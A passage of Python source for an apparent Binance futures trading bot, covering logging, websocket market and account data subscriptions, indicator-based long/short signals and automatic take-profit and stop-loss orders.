folder_path = 'logs/' + self.__paried_symbol + '/' + folder_name
self.__recommendation_log_path = folder_path + "/recommendation.txt"
self.__order_log_path = folder_path + "/order.txt"
self.__error_log_path = folder_path + "/error.txt"
self.__position_log_path = folder_path + "/position.txt"
self.__profit_log_path = folder_path + "/profit.txt"
if not os.path.exists('logs'):
os.mkdir('logs')
if not os.path.exists('logs/' + self.__paried_symbol):
os.mkdir('logs/' + self.__paried_symbol)
if not os.path.exists(folder_path):
os.mkdir(folder_path)
current_datetime = utc_2_datetime(current_time)
recommendation_logs = open(self.__recommendation_log_path,"w+")
recommendation_logs.write("This recommendation log was created at UTC: {}({}).\n".format(current_time, current_datetime))
recommendation_logs.close()
order_logs = open(self.__order_log_path,"w+")
order_logs.write("This order log was created at UTC: {}({}).\n".format(current_time, current_datetime))
order_logs.close()
error_logs = open(self.__error_log_path, "w+")
error_logs.write("This error log was created at UTC: {}({}).\n".format(current_time, current_datetime))
error_logs.close()
error_logs = open(self.__position_log_path, "w+")
error_logs.write("This position log was created at UTC: {}({}).\n".format(current_time, current_datetime))
error_logs.close()
error_logs = open(self.__profit_log_path, "w+")
error_logs.write("This profit log was created at UTC: {}({}).\n".format(current_time, current_datetime))
error_logs.close()
except Exception as e:
print("An error occurs while making log directory: ", e)
return False
else:
return True
def update_parired_asset_info(self):
"""
https://binance-docs.github.io/apidocs/futures/cn/#0f3f2d5ee7
https://www.w3schools.com/python/ref_func_hasattr.asp
"""
for item in self.exchange_info.symbols:
# PrintMix.print_data(item)
if ((hasattr(item, 'contractType')) and (hasattr(item, 'symbol')) and (hasattr(item, 'pair'))):
if ((item.pair == self.__paried_symbol) and (item.symbol == self.__paried_symbol) and (item.contractType == "PERPETUAL")):
# PrintMix.print_data(item)
self.paired_asset_info = item
self.__pricePrecision = item.pricePrecision
self.__quantityPrecision = item.quantityPrecision
self.__baseAssetPrecision = item.baseAssetPrecision
self.__quotePrecision = item.quotePrecision
break
if self.paired_asset_info == None:
raise Exception('\nInvalid symbol: {}\n'.format(self.__paried_symbol))
else:
self.update_parired_asset_info()
print('\n========== Succeed updating paired asset info ==========\n')
def update_exchange_info(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#0f3f2d5ee7
'''
result = self.request_client.get_exchange_information()
self.exchange_info = result
if self.exchange_info == None:
raise Exception('\nFailed updating exchange info\n')
print('========== Succeed updating exchage info ==========')
def update_client(self):
client = Client(self.__api_key, self.__api_secret)
self.client = client
if self.client == None:
raise Exception('\nFailed updating client\n')
print('========== Succeed updating client ==========')
def update_listen_key(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#listenkey-user_stream-
'''
request_client = RequestClient(api_key=self.__api_key, secret_key=self.__api_secret)
listen_key = request_client.start_user_data_stream()
self.request_client = request_client
self.listen_key = listen_key
self.update_sub_client()
print('========== Succeed updating listen key ==========')
def extend_listen_key(self):
'''
Keep user data stream
https://binance-docs.github.io/apidocs/futures/cn/#listenkey-user_stream2
'''
result = self.request_client.keep_user_data_stream()
print("Trying to reconnect...\nResult: ", result)
def update_account_info(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#v2-user_data-2
'''
result = self.request_client.get_account_information_v2()
self.account_info = result
if self.account_info == None:
raise Exception('\nFailed updating account info\n')
print('========== Succeed updating account info ==========')
def update_sub_client(self):
sub_client = SubscriptionClient(api_key=g_api_key, secret_key=g_secret_key)
self.sub_client = sub_client
if self.sub_client == None:
raise Exception('\nFailed updating subscription client\n')
print('========== Succeed updating subscription client ==========')
def subscribe_book_depth_event(self):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/example/websocket/subscribebookdepth.py
https://binance-docs.github.io/apidocs/futures/cn/#6ae7c2b506
'''
logger = logging.getLogger("binance-futures")
logger.setLevel(level=logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
def callback(data_type: 'SubscribeMessageType', event: 'any'):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderbookevent.py
'''
if data_type == SubscribeMessageType.RESPONSE:
pass
# print("Event ID: ", event)
elif data_type == SubscribeMessageType.PAYLOAD:
self.depth_object = event
self.__latest_depth_update_timestamp = event.transactionTime
# print("Event type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("transaction time: ", event.transactionTime)
# print("Symbol: ", event.symbol)
# print("first update Id from last stream: ", event.firstUpdateId)
# print("last update Id from last stream: ", event.lastUpdateId)
# print("last update Id in last stream: ", event.lastUpdateIdInlastStream)
# print("=== Bids ===")
# PrintMix.print_data(event.bids)
# print("===================")
# print("=== Asks ===")
# PrintMix.print_data(event.asks)
# print("===================")
else:
print("Unknown Data:")
# print()
def error(e: 'BinanceApiException'):
print(e.error_code + e.error_message)
log = "\n\n{}\nBook depth subscription error: {} at {}\n{}\n\n".format(self.margin,
e.error_code + e.error_message,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
# Valid limit values are 5, 10, or 20
self.sub_client.subscribe_book_depth_event(self.__paried_symbol.lower(), 20, callback, error, update_time=UpdateTime.FAST)
#sub_client.subscribe_book_depth_event("btcusdt", 10, callback, error, update_time=UpdateTime.NORMAL)
#sub_client.subscribe_book_depth_event("btcusdt", 10, callback, error)
def subscribe_user_data_event(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#balance-position
https://binance-docs.github.io/apidocs/futures/cn/#060a012f0b
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/accountupdate.py
'''
logger = logging.getLogger("binance-client")
logger.setLevel(level=logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
sub_client = self.sub_client
def callback(data_type: 'SubscribeMessageType', event: 'any'):
if data_type == SubscribeMessageType.RESPONSE:
print("Event ID: ", event)
elif data_type == SubscribeMessageType.PAYLOAD:
if (event.eventType == "ACCOUNT_UPDATE"):
for item in event.positions:
if (item.symbol == self.__paried_symbol):
self.account_update_list.append(event)
put_to_log('\n\nPosition updated: {}\n{}\n'.format(current_date_time(), convert_object_to_string(item)), self.__position_log_path)
# print('\n\n\n------------------')
# print('Position amount')
# print("Event Type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("Current time: ", current_date_time())
# print("Transaction time: ", event.transactionTime)
# print('------------------')
# print("=== Balances ===")
# PrintMix.print_data(event.balances)
# print("================")
# print("=== Positions ===")
# PrintMix.print_data(event.positions)
# print("================")
elif(event.eventType == "ORDER_TRADE_UPDATE"):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderupdate.py
NEW
PARTIAL_FILL 部分成交
FILL 成交
CANCELED 已撤
CALCULATED
EXPIRED 订单失效
TRADE 交易
'''
if event.symbol == self.__paried_symbol:
self.order_update_list.append(event)
# print('------------------')
# print("Event Type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("Current time: ", current_date_time())
# print("Transaction Time: ", event.transactionTime)
# print('------------------\n\n\n')
# print("Symbol: ", event.symbol)
# print("Client Order Id: ", event.clientOrderId)
# print("Side: ", event.side)
# print("Order Type: ", event.type)
# print("Time in Force: ", event.timeInForce)
# print("Original Quantity: ", event.origQty)
# print("Position Side: ", event.positionSide)
# print("Price: ", event.price)
# print("Average Price: ", event.avgPrice)
# print("Stop Price: ", event.stopPrice)
# print("Execution Type: ", event.executionType)
# print("Order Status: ", event.orderStatus)
# print("Order Id: ", event.orderId)
# print("Order Last Filled Quantity: ", event.lastFilledQty)
# print("Order Filled Accumulated Quantity: ", event.cumulativeFilledQty)
# print("Last Filled Price: ", event.lastFilledPrice)
# print("Commission Asset: ", event.commissionAsset)
# print("Commissions: ", event.commissionAmount)
# print("Order Trade Time: ", event.orderTradeTime)
# print("Trade Id: ", event.tradeID)
# print("Bids Notional: ", event.bidsNotional)
# print("Ask Notional: ", event.asksNotional)
# print("Is this trade the maker side?: ", event.isMarkerSide)
# print("Is this reduce only: ", event.isReduceOnly)
# print("stop price working type: ", event.workingType)
# print("Is this Close-All: ", event.isClosePosition)
# if not event.activationPrice is None:
# print("Activation Price for Trailing Stop: ", event.activationPrice)
# if not event.callbackRate is None:
# print("Callback Rate for Trailing Stop: ", event.callbackRate)
elif(event.eventType == "listenKeyExpired"):
print("\nEvent: ", event.eventType)
print("Event time: ", event.eventTime)
print("CAUTION: YOUR LISTEN-KEY HAS BEEN EXPIRED!!!")
print("CAUTION: YOUR LISTEN-KEY HAS BEEN EXPIRED!!!")
print("CAUTION: YOUR LISTEN-KEY HAS BEEN EXPIRED!!!")
self.extend_listen_key()
else:
print("Unknown Data:")
# print()
def error(e: 'BinanceApiException'):
# print(e.error_code + e.error_message)
log = "\n\n{}\nUser data subscription error: {} at {}\n{}\n\n".format(self.margin,
e.error_code + e.error_message,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
sub_client.subscribe_user_data_event(self.listen_key, callback, error)
def subscribe_candlestick_event(self):
'''
https://binance-docs.github.io/apidocs/futures/cn/#k-4
or
https://binance-docs.github.io/apidocs/futures/cn/#k-5
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/candlestickevent.py
'''
logger = logging.getLogger("binance-futures")
logger.setLevel(level=logging.INFO)
handler = logging.StreamHandler()
handler.setFormatter(logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s'))
logger.addHandler(handler)
sub_client = self.sub_client
def callback(data_type: 'SubscribeMessageType', event: 'any'):
if data_type == SubscribeMessageType.RESPONSE:
pass
# print("Event ID: ", event)
elif data_type == SubscribeMessageType.PAYLOAD:
self.update_historical_kline(event)
# print("Event type: ", event.eventType)
# print("Event time: ", event.eventTime)
# print("Symbol: ", event.symbol)
# print("Data:")
# PrintBasic.print_obj(event.data)
else:
print("Unknown Data:")
# print()
def error(e: 'BinanceApiException'):
# print(e.error_code + e.error_message)
log = "\n\n{}\nCandlestick subscription error: {} at {}\n{}\n\n".format(self.margin,
e.error_code + e.error_message,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
sub_client.subscribe_candlestick_event(self.__paried_symbol.lower(), self.__interval, callback, error)
def update_historical_kline(self, event):
'''
https://binance-docs.github.io/apidocs/futures/cn/#k-4
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/candlestickevent.py
event:
Event type: kline
Event time: 1609506873291
Symbol: BLZUSDT
Data:
close:0.06756
closeTime:1609506899999
firstTradeId:3634790
high:0.06758
ignore:0
interval:1m
isClosed:False
json_parse:<function Candlestick.json_parse at 0x107909d30>
lastTradeId:3634796
low:0.06751
numTrades:7
open:0.06758
quoteAssetVolume:746.46888
startTime:1609506840000
symbol:BLZUSDT
takerBuyBaseAssetVolume:0.0
takerBuyQuoteAssetVolume:0.0
volume:11054.0
'''
try:
startTime = event.data.startTime
isClosed = event.data.isClosed
if ( (not isClosed) and ( (startTime - self.kline_info['updated_time']) < 60000 ) ):
kline_info = self.kline_info.copy()
kline_object = event.data
kline_info['kline_list']['open_price_list'][-1] = float(kline_object.open) # o
kline_info['kline_list']['high_price_list'][-1] = float(kline_object.high) # h
kline_info['kline_list']['low_price_list'][-1] = float(kline_object.low) # l
kline_info['kline_list']['close_price_list'][-1] = float(kline_object.close) # c
kline_info['kline_list']['quoteAssetVolume_list'][-1] = float(kline_object.quoteAssetVolume) # vol(quoAsset)
kline_info['kline_list']['volume_list'][-1] = float(kline_object.volume) # vol
kline_info['kline_list']['takerBuyBaseAssetVolume_list'][-1] = float(kline_object.takerBuyBaseAssetVolume) # takerBuyBaseAssetVolume
kline_info['kline_list']['takerBuyQuoteAssetVolume_list'][-1] = float(kline_object.takerBuyQuoteAssetVolume) # takerBuyQuoteAssetVolume
kline_info['kline_list']['numTrades_list'][-1] = int(kline_object.numTrades) # numTrades
self.kline_info = kline_info
else:
self.get_historical_kline()
self.__latest_data_update_timestamp = event.eventTime
except Exception as e:
log = "\n\n{}\nAn ERROR happend while updating historical data: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def get_historical_kline(self):
'''
klines:
close:347.15
closeTime:1609496279999
high:347.75
ignore:0
json_parse:<function Candlestick.json_parse at 0x10c8b41f0>
low:347.06
numTrades:298
open:347.30
openTime:1609496220000
quoteAssetVolume:65901.36106
takerBuyBaseAssetVolume:111.498
takerBuyQuoteAssetVolume:38745.65489
volume:189.645
[
[
1499040000000, // 开盘时间
"0.01634790", // 开盘价 o
"0.80000000", // 最高价 h
"0.01575800", // 最低价 l
"0.01577100", // 收盘价(当前K线未结束的即为最新价) c
"148976.11427815", // 成交量
1499644799999, // 收盘时间
"2434.19055334", // 成交额
308, // 成交笔数
"1756.87402397", // 主动买入成交量
"28.46694368", // 主动买入成交额
"17928899.62484339" // 请忽略该参数
]
]
'''
try:
klines = self.request_client.get_candlestick_data(symbol=self.__paried_symbol, interval=self.__interval,limit=self.__initial_data_num)
# PrintBasic.print_obj(klines[-1])
last_n = klines[((-1) * self.__initial_data_num):]
kline_info = self.kline_info.copy()
kline_info['kline_list'] = {
'open_price_list': [],
'high_price_list': [],
'low_price_list': [],
'close_price_list': [],
'quoteAssetVolume_list': [],
'volume_list': [],
'takerBuyBaseAssetVolume_list': [],
'takerBuyQuoteAssetVolume_list': [],
'numTrades_list': []
}
kline_info['updated_time'] = last_n[-1].openTime
for item in last_n:
kline_info['kline_list']['open_price_list'].append(float(item.open)) # o
kline_info['kline_list']['high_price_list'].append(float(item.high)) # h
kline_info['kline_list']['low_price_list'].append(float(item.low)) # l
kline_info['kline_list']['close_price_list'].append(float(item.close)) # c
kline_info['kline_list']['quoteAssetVolume_list'].append(float(item.quoteAssetVolume)) # vol(quoAsset)
kline_info['kline_list']['volume_list'].append(float(item.volume)) # vol
kline_info['kline_list']['takerBuyBaseAssetVolume_list'].append(float(item.takerBuyBaseAssetVolume)) # takerBuyBaseAssetVolume
kline_info['kline_list']['takerBuyQuoteAssetVolume_list'].append(float(item.takerBuyQuoteAssetVolume)) # takerBuyQuoteAssetVolume
kline_info['kline_list']['numTrades_list'].append(int(item.numTrades)) # numTrades
self.kline_info = kline_info
print('========== Succeed getting historical data ==========')
# print(self.kline_info['kline_list']['close_price_list'])
except Exception as e:
log = "\n\n{}\nAn ERROR happend while getting historical data: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def start_subscribing(self):
try:
t1 = threading.Thread(target=self.subscribe_candlestick_event)
t2 = threading.Thread(target=self.subscribe_user_data_event)
# t3 = threading.Thread(target=self.subscribe_book_depth_event)
# subs_task_list = [t1, t2, t3]
subs_task_list = [t1, t2]
for task in subs_task_list:
task.start()
for task in subs_task_list:
task.join()
except Exception as e:
log = "\n\n{}\nAn ERROR happend while starting subscription: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def start_handler(self):
time.sleep(3)
try:
t1 = threading.Thread(target=self.order_handler)
t2 = threading.Thread(target=self.position_handler)
t3 = threading.Thread(target=self.position_status_handler)
handler_task_list = [t1, t2, t3]
for task in handler_task_list:
task.start()
for task in handler_task_list:
task.join()
except Exception as e:
log = "\n\n{}\nAn ERROR happend while starting the handler: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def get_recommendation(self, MACD_dict, EMA_dict, RSI_dict, EMV_list, kline_dict):
level = 0
side = None
try:
# Long
if ( ( EMA_dict['ema2'][-1] > EMA_dict['ema3'][-1] ) and ( EMA_dict['ema2'][-2] < EMA_dict['ema3'][-2] ) ):
side = 'long'
level = 3
return level, side
# Short
elif ( ( EMA_dict['ema2'][-1] < EMA_dict['ema3'][-1] ) and ( EMA_dict['ema2'][-2] > EMA_dict['ema3'][-2] ) ):
side = 'short'
level = 3
return level, side
# Long
elif ( ( EMV_list[-2] < 0 ) and ( EMV_list[-1] > 0 ) and ( RSI_dict['rsi1'][-1] > 30 ) and ( RSI_dict['rsi1'][-2] < 30 ) and ( RSI_dict['rsi2'][-1] > 30 ) and ( RSI_dict['rsi2'][-2] < 30 ) and ( RSI_dict['rsi3'][-1] > 30 ) and ( RSI_dict['rsi3'][-2] < 30 ) ):
side = 'long'
level = 2
return level, side
# Short
elif ( ( EMV_list[-2] > 0 ) and ( EMV_list[-1] < 0 ) and ( RSI_dict['rsi1'][-1] < 70 ) and ( RSI_dict['rsi1'][-2] > 70 ) and ( RSI_dict['rsi2'][-1] < 70 ) and ( RSI_dict['rsi2'][-2] > 70 ) and ( RSI_dict['rsi3'][-1] < 70 ) and ( RSI_dict['rsi3'][-2] > 70 ) ):
side = 'short'
level = 2
return level, side
# # Long
# elif ( ( ( EMA_dict['ema1'][-1] > EMA_dict['ema3'][-1] ) and ( EMA_dict['ema1'][-2] < EMA_dict['ema3'][-2] ) ) and ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) > 0 ) and ( ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) - ( MACD_dict['macd'][-2] - MACD_dict['macdsignal'][-2] ) ) > 0 ) ):
# side = 'long'
# level = 1
# return level, side
# # Short
# elif ( ( ( EMA_dict['ema1'][-1] < EMA_dict['ema3'][-1] ) and ( EMA_dict['ema1'][-2] > EMA_dict['ema3'][-2] ) ) and ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) < 0 ) and ( ( ( MACD_dict['macd'][-1] - MACD_dict['macdsignal'][-1] ) - ( MACD_dict['macd'][-2] - MACD_dict['macdsignal'][-2] ) ) < 0 ) ):
# side = 'short'
# level = 1
# return level, side
except Exception as e:
log = "\n\n{}\nAn ERROR happend while getting recommendations: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
return level, side
else:
#Test
# side = ('long' if random.randint(1,2) == 1 else 'short')
# level = random.randint(1,2)
return level, side
def start_analysing(self):
while True:
try:
# print((self.current_recommendation['short']['updated_time']))
if ((current_utc_time() - (self.current_recommendation['short']['updated_time'])) > 0.5):
self.current_recommendation['short'] = {
'updated_time': 0,
'level': 0,
'price': None
}
if ((current_utc_time() - (self.current_recommendation['long']['updated_time'])) > 0.5):
self.current_recommendation['long'] = {
'updated_time': 0,
'level': 0,
'price': None
}
kline_info = self.kline_info
if (len(kline_info['kline_list']['close_price_list']) == self.__initial_data_num):
self.__latest_data_analysis_timestamp = self.__latest_data_update_timestamp
MACD, EMA, RSI, EMV = get_indicators(kline_info['kline_list'], self.indicator_config)
np_type = type(np.array([]))
if ((type(MACD) == np_type) and (type(EMA) == np_type) and (type(RSI) == np_type) and (type(EMV) == np_type)):
MACD_dict = {
'macd': np.round(MACD[0], decimals=4),
'macdsignal': np.round(MACD[1], decimals=4),
'macdhist': np.round(MACD[2], decimals=4)
}
EMA_dict = {
'ema1': np.round(EMA[0], decimals=3),
'ema2': np.round(EMA[1], decimals=3),
'ema3': np.round(EMA[2], decimals=3)
}
RSI_dict = {
'rsi1': np.round(RSI[0], decimals=3),
'rsi2': np.round(RSI[1], decimals=3),
'rsi3': np.round(RSI[2], decimals=3)
}
EMV_list = np.round(EMV, decimals=3)
self.indicator_dict = {
'MACD_dict': MACD_dict,
'EMA_dict': EMA_dict,
'RSI_dict': RSI_dict,
'EMV_list': EMV_list
}
latest_price = kline_info['kline_list']['close_price_list'][-1]
level, side = self.get_recommendation(MACD_dict, EMA_dict, RSI_dict, EMV_list, kline_info['kline_list'])
'''
self.current_recommendation = {
'short': {
'updated_time': 0,
'level': 0,
'price': None
},
'long': {
'updated_time': None,
'level': 0,
'price': None
}
}
'''
if level >= 0:
if (side == 'long' or side == 'short'):
self.current_recommendation[side]['level'] = level
self.current_recommendation[side]['price'] = latest_price
self.current_recommendation[side]['updated_time'] = current_utc_time()
temp_logs = '\n\n{}\nNew {} recommendation:\nLevel: {}\nPrice: {}\nDatetime: {}\nTimestamp: {}\n{}\n\n'.format(
self.margin,
side.upper(),
level,
latest_price,
utc_2_datetime(self.current_recommendation[side]['updated_time']),
self.current_recommendation[side]['updated_time'],
self.margin
)
# print(temp_logs)
put_to_log(temp_logs, self.__recommendation_log_path)
# print ("\r||(MACD - MACDSignal) = {:.3f}||RSI({}): {:.3f}||RSI({}): {:.3f}||RSI({}): {:.3f}||EMA{}: {:.3f}||EMA{}: {:.3f}|| EMA{}: {:.3f}||Buy level: {}||Sell level: {}||Price: {:.2f}||Time: {}||".format
# (macd[-1] - macdsignal[-1],
# self.indicator_config['rsi']['rsi1'],
# rsi1[-1],
# self.indicator_config['rsi']['rsi2'],
# rsi2[-1],
# self.indicator_config['rsi']['rsi3'],
# rsi3[-1],
# self.indicator_config['ema']['ema1'],
# ema1[-1],
# self.indicator_config['ema']['ema2'],
# ema2[-1],
# self.indicator_config['ema']['ema3'],
# ema3[-1],
# buy_level,
# sell_level,
# float(np_price_list[-1]),
# current_date_time()
# ), end="")
except Exception as e:
log = "\n\n{}\nAn ERROR happend while analyzing market data: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def check_if_service_avaliable(self):
'''
https://stackoverflow.com/questions/16755394/what-is-the-easiest-way-to-get-current-gmt-time-in-unix-timestamp-format
'''
time.sleep(3)
while True:
if len(self.current_position_dict) > 0:
string = "\r|" + current_date_time()
for clientID in self.current_position_dict.keys():
string += "|PositionSide: {} |Amount: {} |EntryPrice: {}|CurrentPrice: {} ROE: {:.3f}%| ".format(
self.current_position_dict[clientID]['positionSide'],
self.current_position_dict[clientID]['quantity'] if self.current_position_dict[clientID]['quantity']!= None else "NA",
self.current_position_dict[clientID]['entryPrice'] if self.current_position_dict[clientID]['entryPrice'] else "NA",
self.kline_info['kline_list']['close_price_list'][-1] if self.kline_info['kline_list']['close_price_list'][-1] != None else "NA",
(100*self.__leverage*(self.kline_info['kline_list']['close_price_list'][-1]/self.current_position_dict[clientID]['entryPrice']-1) * (-1 if self.current_position_dict[clientID]['positionSide'].lower() == 'short' else 1)) if ( self.current_position_dict[clientID]['entryPrice'] != None) else 0.00
)
print(string, end = "")
else:
kling_string = '|o:{:.2f}|h:{:.2f}|l:{:.2f}|c:{:.2f}|QuoVol:{:.2f}|BaseVol:{:.2f}|BuyBaseVol:{:.2f}|BuyQuoVol:{:.2f}|numTrades:{}|'.format(
self.kline_info['kline_list']['open_price_list'][-1],
self.kline_info['kline_list']['high_price_list'][-1],
self.kline_info['kline_list']['low_price_list'][-1],
self.kline_info['kline_list']['close_price_list'][-1],
self.kline_info['kline_list']['quoteAssetVolume_list'][-1],
self.kline_info['kline_list']['volume_list'][-1],
self.kline_info['kline_list']['takerBuyBaseAssetVolume_list'][-1],
self.kline_info['kline_list']['takerBuyQuoteAssetVolume_list'][-1],
self.kline_info['kline_list']['numTrades_list'][-1]
)
recommendation_string = ' |LONG:L: {},P:{}|SHORT:L: {},P:{}|'.format(
self.current_recommendation['long']['level'],
self.current_recommendation['long']['price'],
self.current_recommendation['short']['level'],
self.current_recommendation['short']['price']
)
indicator_dict = self.indicator_dict.copy()
if len(indicator_dict) > 0:
indicator_string = '|EMA:{:.2f}--{:.2f}--{:.2f}|MACDdiff:{:.2f}|EMV:{:.2f}|'.format(
indicator_dict['EMA_dict']['ema1'][-1],
indicator_dict['EMA_dict']['ema2'][-1],
indicator_dict['EMA_dict']['ema3'][-1],
indicator_dict['MACD_dict']['macd'][-1] - indicator_dict['MACD_dict']['macdsignal'][-1],
indicator_dict['EMV_list'][-1]
)
else:
indicator_string = ""
print('\r' + kling_string + recommendation_string + indicator_string, end="")
try:
# time.sleep(1)
# if self.depth_object!= None:
# bids_string = '{}'.format([order.price for order in self.depth_object.bids[-10:]])
# asks_string = '{}'.format([order.price for order in self.depth_object.asks[-10:]])
# margin = '========================================================================='
# print('\n\n\n{}\nRecent Market Prices:\n{}\n\nTop bids:\n{}\n\nTop asks:\n{}\n{}\n\n\n'.format(margin, price_string, bids_string, asks_string, margin))
current_time = current_utc_time()*1000
# server_status = self.client.get_system_status()
current_candlestick_data_time = int(self.__latest_data_update_timestamp)
current_depth_data_time = int(self.__latest_depth_update_timestamp)
candlestick_data_time_diff_in_seconds = (current_time - current_candlestick_data_time)/1000
depth_data_time_diff_in_seconds = (current_time - current_depth_data_time)/1000
# if server_status['status'] == 1:
# print('> > > > > > > > > > > > > > System maintenance. < < < < < < < < < < < < < < < <')
if ((candlestick_data_time_diff_in_seconds > 2) and (current_time != (candlestick_data_time_diff_in_seconds*1000))):
print("Candlestick data fetching was down for: {:.3f}s".format(candlestick_data_time_diff_in_seconds))
if ((depth_data_time_diff_in_seconds > 2) and (current_time!=(depth_data_time_diff_in_seconds*1000))):
print("Depth data fetching was down for: {:.3f}s".format(depth_data_time_diff_in_seconds))
except Exception as e:
log = "\n\n{}\nAn ERROR happend while monitoring services: {} at {}\n{}\n\n".format(self.margin,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
def position_handler(self):
'''
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderupdate.py
has_key was removed in Python 3:
https://stackoverflow.com/questions/33727149/dict-object-has-no-attribute-has-key?answertab=votes#tab-top
https://docs.python.org/3.0/whatsnew/3.0.html#builtins
https://github.com/Binance-docs/Binance_Futures_python/blob/master/binance_f/model/orderupdate.py
self.current_position_dict = {
'uniqueOrderId': {
'uniqueOrderId': None
'level': 1, 2, or 3
'positionSide': 'SIDE',
'trigeredPrice': -99999
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'comission': 999,
'relatedOrderID': {}
}
Order status (status):
NEW
PARTIALLY_FILLED
FILLED
CANCELED
REJECTED
EXPIRED
'''
while True:
try:
if len(self.order_update_list) > 0:
first_order = self.order_update_list.pop(0)
clientOrderId = first_order.clientOrderId
if len(clientOrderId) >= 13:
prefix_id = clientOrderId[:13]
else:
prefix_id = clientOrderId
if (prefix_id in self.current_position_dict):
print("\n====================================================================\nReceived a bot order:")
PrintMix.print_data(first_order)
put_to_log('\n\nBot order: {}\n{}\n'.format(current_date_time(), convert_object_to_string(first_order)), self.__order_log_path)
print("====================================================================")
positionSide = first_order.positionSide.lower()
orderPosition = first_order.side.lower()
orderStatus = first_order.orderStatus.lower()
self.current_position_dict[prefix_id]['relatedOrderID'][clientOrderId] = first_order
if ((positionSide == 'long' and orderPosition == 'buy') or (positionSide == 'short' and orderPosition == 'sell')):
if (orderStatus == 'PARTIALLY_FILLED'.lower() or orderStatus == 'FILLED'.lower()):
if orderStatus == 'PARTIALLY_FILLED'.lower():
try:
self.client.futures_cancel_order(origClientOrderId = clientOrderId, symbol = self.__paried_symbol)
except Exception as e:
log = "\n\n{}\nAn ERROR happend while cancelling the unfilled order: {}, ERROR({}) at {}\n{}\n\n".format(self.margin,
clientOrderId,
e,
str(datetime.fromtimestamp(current_utc_time())),
self.margin
)
print(log)
put_to_log(log, self.__error_log_path)
self.current_position_dict[prefix_id]['entryPrice'] = first_order.avgPrice
self.current_position_dict[prefix_id]['quantity'] = first_order.cumulativeFilledQty
self.current_position_dict[prefix_id]['comission'] += (0 if first_order.commissionAmount == None else first_order.commissionAmount)
#TODO: sell order:
correspondingTargetProfitRatio = self.target_profit_dict['level' + str(self.current_position_dict[prefix_id]['level'])]
if positionSide.lower() == 'long':
TP_stopPrice = round( ( first_order.avgPrice * (1+ (correspondingTargetProfitRatio + self.__comission_rate)/self.__leverage) ) ,2)
SM_stopPrice = round( ( first_order.avgPrice * (1-(self.__stop_loss_ratio)/self.__leverage) ),2)
elif positionSide.lower() == 'short':
TP_stopPrice = round( ( first_order.avgPrice * (1 - (correspondingTargetProfitRatio + self.__comission_rate)/self.__leverage) ) ,2)
SM_stopPrice = round( ( first_order.avgPrice * (1 + (self.__stop_loss_ratio)/self.__leverage) ),2)
quantity =round((first_order.avgPrice*first_order.lastFilledQty),3)
orderSide = (OrderSide.BUY if positionSide.lower() == "short" else OrderSide.SELL)
time.sleep(1)
# Take profit order
self.client.futures_create_order(symbol = self.__paried_symbol,
side=orderSide,
type=OrderType.TAKE_PROFIT,
positionSide=positionSide.upper(),
# closePosition=True,
quantity =quantity,
stopPrice = TP_stopPrice,
price = TP_stopPrice,
newClientOrderId= prefix_id + orderSide + "_" + positionSide.upper() + "_TP",
)
# Stop loss order
self.client.futures_create_order(symbol = self.__paried_symbol,
side=orderSide,
type=OrderType.STOP_MARKET,
positionSide=positionSide.upper(),
closePosition=True,
quantity =quantity,
stopPrice = SM_stopPrice,
newClientOrderId= prefix_id + orderSide + "_" + positionSide.upper() + "_SM",
)
elif ((positionSide == 'long' and orderPosition == 'sell') or (positionSide == 'short' and orderPosition == 'buy')):
self.current_position_dict[prefix_id]['comission'] += (0 if first_order.commissionAmount == None else first_order.commissionAmount)
if orderStatus == 'FILLED'.lower():
TP = clientOrderId[:-2] + "TP"
SM = clientOrderId[:-2] + "SM"
clientOrderID_not_filled = TP if clientOrderId[-2:] == "SM" else SM
originalSpend = self.current_position_dict[prefix_id]['entryPrice'] * self.current_position_dict[prefix_id]['quantity']
TP_quantity = self.current_position_dict[prefix_id]['relatedOrderID'][TP].cumulativeFilledQty
